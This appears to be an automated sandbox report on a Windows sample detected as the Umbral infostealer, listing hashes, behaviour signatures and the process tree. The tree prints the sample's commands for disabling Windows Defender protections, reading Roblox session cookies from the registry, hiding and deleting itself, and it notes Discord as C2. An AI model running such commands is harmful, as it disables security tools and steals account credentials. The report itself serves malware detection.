Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/01/2025, 05:15
Behavioral task
behavioral1
Sample
3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe
Resource
win7-20240903-en
General
-
Target
3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe
-
Size
229KB
-
MD5
4bc2e7ac1436d46b28811c13b73b7700
-
SHA1
113e650f1c5d41a20bdcf33152d2b90ba23b04e9
-
SHA256
3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0
-
SHA512
114eb0f25fd0d1f9378645007f327dd7d9aa99065e3982b473a89bd08fb529c3d6d0092c79dc1f6fa12ed99e2f12a7820b6e3c9254f5d838df29131bb7b2001f
-
SSDEEP
6144:tloZM+rIkd8g+EtXHkv/iD4/E0fAmB5Kz/Cwhl0Adb8e1mc3li:voZtL+EP8/E0fAmB5Kz/Cwhl007c
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2392-1-0x0000000000D80000-0x0000000000DC0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2872 powershell.exe 2840 powershell.exe 2640 powershell.exe 1756 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe -
Deletes itself 1 IoCs
pid Process 3012 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3012 cmd.exe 1124 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2264 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1124 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 2872 powershell.exe 2840 powershell.exe 2640 powershell.exe 576 powershell.exe 1756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe Token: SeIncreaseQuotaPrivilege 948 wmic.exe Token: SeSecurityPrivilege 948 wmic.exe Token: SeTakeOwnershipPrivilege 948 wmic.exe Token: SeLoadDriverPrivilege 948 wmic.exe Token: SeSystemProfilePrivilege 948 wmic.exe Token: SeSystemtimePrivilege 948 wmic.exe Token: SeProfSingleProcessPrivilege 948 wmic.exe Token: SeIncBasePriorityPrivilege 948 wmic.exe Token: SeCreatePagefilePrivilege 948 wmic.exe Token: SeBackupPrivilege 948 wmic.exe Token: SeRestorePrivilege 948 wmic.exe Token: SeShutdownPrivilege 948 wmic.exe Token: SeDebugPrivilege 948 wmic.exe Token: SeSystemEnvironmentPrivilege 948 wmic.exe Token: SeRemoteShutdownPrivilege 948 wmic.exe Token: SeUndockPrivilege 948 wmic.exe Token: SeManageVolumePrivilege 948 wmic.exe Token: 33 948 wmic.exe Token: 34 948 wmic.exe Token: 35 948 wmic.exe Token: SeIncreaseQuotaPrivilege 948 wmic.exe Token: SeSecurityPrivilege 948 wmic.exe Token: SeTakeOwnershipPrivilege 948 wmic.exe Token: SeLoadDriverPrivilege 948 wmic.exe Token: SeSystemProfilePrivilege 948 wmic.exe Token: SeSystemtimePrivilege 948 wmic.exe Token: SeProfSingleProcessPrivilege 948 wmic.exe Token: SeIncBasePriorityPrivilege 948 wmic.exe Token: SeCreatePagefilePrivilege 948 wmic.exe Token: SeBackupPrivilege 948 wmic.exe Token: SeRestorePrivilege 948 wmic.exe Token: SeShutdownPrivilege 948 wmic.exe Token: SeDebugPrivilege 948 wmic.exe Token: SeSystemEnvironmentPrivilege 948 wmic.exe Token: SeRemoteShutdownPrivilege 948 wmic.exe Token: SeUndockPrivilege 948 wmic.exe Token: SeManageVolumePrivilege 948 wmic.exe Token: 33 948 wmic.exe Token: 34 948 wmic.exe Token: 35 948 wmic.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeIncreaseQuotaPrivilege 1944 wmic.exe Token: SeSecurityPrivilege 1944 wmic.exe Token: SeTakeOwnershipPrivilege 1944 wmic.exe Token: SeLoadDriverPrivilege 1944 wmic.exe Token: SeSystemProfilePrivilege 1944 wmic.exe Token: SeSystemtimePrivilege 1944 wmic.exe Token: SeProfSingleProcessPrivilege 1944 wmic.exe Token: SeIncBasePriorityPrivilege 1944 wmic.exe Token: SeCreatePagefilePrivilege 1944 wmic.exe Token: SeBackupPrivilege 1944 wmic.exe Token: SeRestorePrivilege 1944 wmic.exe Token: SeShutdownPrivilege 1944 wmic.exe Token: SeDebugPrivilege 1944 wmic.exe Token: SeSystemEnvironmentPrivilege 1944 wmic.exe Token: SeRemoteShutdownPrivilege 1944 wmic.exe Token: SeUndockPrivilege 1944 wmic.exe Token: SeManageVolumePrivilege 1944 wmic.exe Token: 33 1944 wmic.exe Token: 34 1944 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2392 wrote to memory of 948 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 30 PID 2392 wrote to memory of 948 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 30 PID 2392 wrote to memory of 948 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 30 PID 2392 wrote to memory of 2824 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 33 PID 2392 wrote to memory of 2824 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 33 PID 2392 wrote to memory of 2824 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 33 PID 2392 wrote to memory of 2872 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 35 PID 2392 wrote to memory of 2872 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 35 PID 2392 wrote to memory of 2872 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 35 PID 2392 wrote to memory of 2840 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 37 PID 2392 wrote to memory of 2840 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 37 PID 2392 wrote to memory of 2840 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 37 PID 2392 wrote to memory of 2640 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 39 PID 2392 wrote to memory of 2640 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 39 PID 2392 wrote to memory of 2640 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 39 PID 2392 wrote to memory of 576 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 41 PID 2392 wrote to memory of 576 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 41 PID 2392 wrote to memory of 576 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 41 PID 2392 wrote to memory of 1944 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 44 PID 2392 wrote to memory of 1944 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 44 PID 2392 wrote to memory of 1944 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 44 PID 2392 wrote to memory of 2012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 46 PID 2392 wrote to memory of 2012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 46 PID 2392 wrote to memory of 2012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 46 PID 2392 wrote to memory of 1332 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 48 PID 2392 wrote to memory of 1332 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 48 PID 2392 wrote to memory of 1332 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 48 PID 2392 wrote to memory of 1756 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 50 PID 2392 wrote to memory of 1756 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 50 PID 2392 wrote to memory of 1756 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 50 PID 2392 wrote to memory of 2264 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 52 PID 2392 wrote to memory of 2264 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 52 PID 2392 wrote to memory of 2264 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 52 PID 2392 wrote to memory of 3012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 54 PID 2392 wrote to memory of 3012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 54 PID 2392 wrote to memory of 3012 2392 3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe 54 PID 3012 wrote to memory of 1124 3012 cmd.exe 56 PID 3012 wrote to memory of 1124 3012 cmd.exe 56 PID 3012 wrote to memory of 1124 3012 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2824 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe"C:\Users\Admin\AppData\Local\Temp\3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe"2⤵
- Views/modifies file attributes
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2012
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1756
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2264
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\3a61a0cf3cc36d28922d8215d7ec5414685e195e694bac030bca29a32d9683a0N.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1124
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c0c987b4e8c390c3c64511ab4ebae644
SHA1803b8f046b0fcc67443e29decb3c43c5ec2537cd
SHA2562a6f67644cc66042af8c5df6a9aeed578952bf5f0bb6369eefa6e822137d6990
SHA512f1989ef32ca1075f8dba1b4e8a230f9dd931d98a82d35effe897bd8e414b1294770160906db974edeba2b8b9d8db2ed6dc4f0371f59fd893041a728c6d8400b4